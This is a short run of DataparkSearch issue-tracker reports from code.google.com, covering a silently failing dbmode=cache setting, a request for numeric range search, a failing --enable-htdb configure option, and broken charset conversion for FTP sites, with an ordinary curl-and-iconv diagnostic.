Initially I configured indexer with
 mysql://foo:bar@localhost/search/?dbmode=cache
changed only username and password.

The indexer indexed without any error, and then search.cgi always returned
0 results.

Later, I re-read the docs and noticed that dbmode must be set to something
else.

So dbmode=cache must either cause an error or be documented.

Original issue reported on code.google.com by [email protected] on 1 Mar 2011 at 3:16

numeric range search

A request from blog.dataparksearch.org/148:

Can you also include numeric range search?

Original issue reported on code.google.com by [email protected] on 24 Apr 2009 at 10:45

Unrecognized options: --enable-htdb

What steps will reproduce the problem?
1. try to install using ./configure or ./install.pl
2. if using ./install.pl, enable htdb option
3. continue accepting defaults

We need to be able to index a database, as we export URLs to a database for
faster indexing and searching, but the latest version will not compile with
htdb support.

Original issue reported on code.google.com by [email protected] on 14 Jan 2010 at 7:55

RemoteCharset does not work properly with FTP sites

LocalCharset UTF-8
RemoteCharset UTF-8
Server ftp://utf8server/
Русские буквы — OK

LocalCharset UTF-8
RemoteCharset windows-1251
Server ftp://winserver/
??????? ????? — fail

but

$ curl ftp://winserver/ | iconv -f cp1251 -t UTF-8
Русские буквы — OK


DPS 4.53, built as a package and installed on Ubuntu 10.04

Original issue reported on code.google.com by [email protected] on 2 Mar 2011 at 9:30
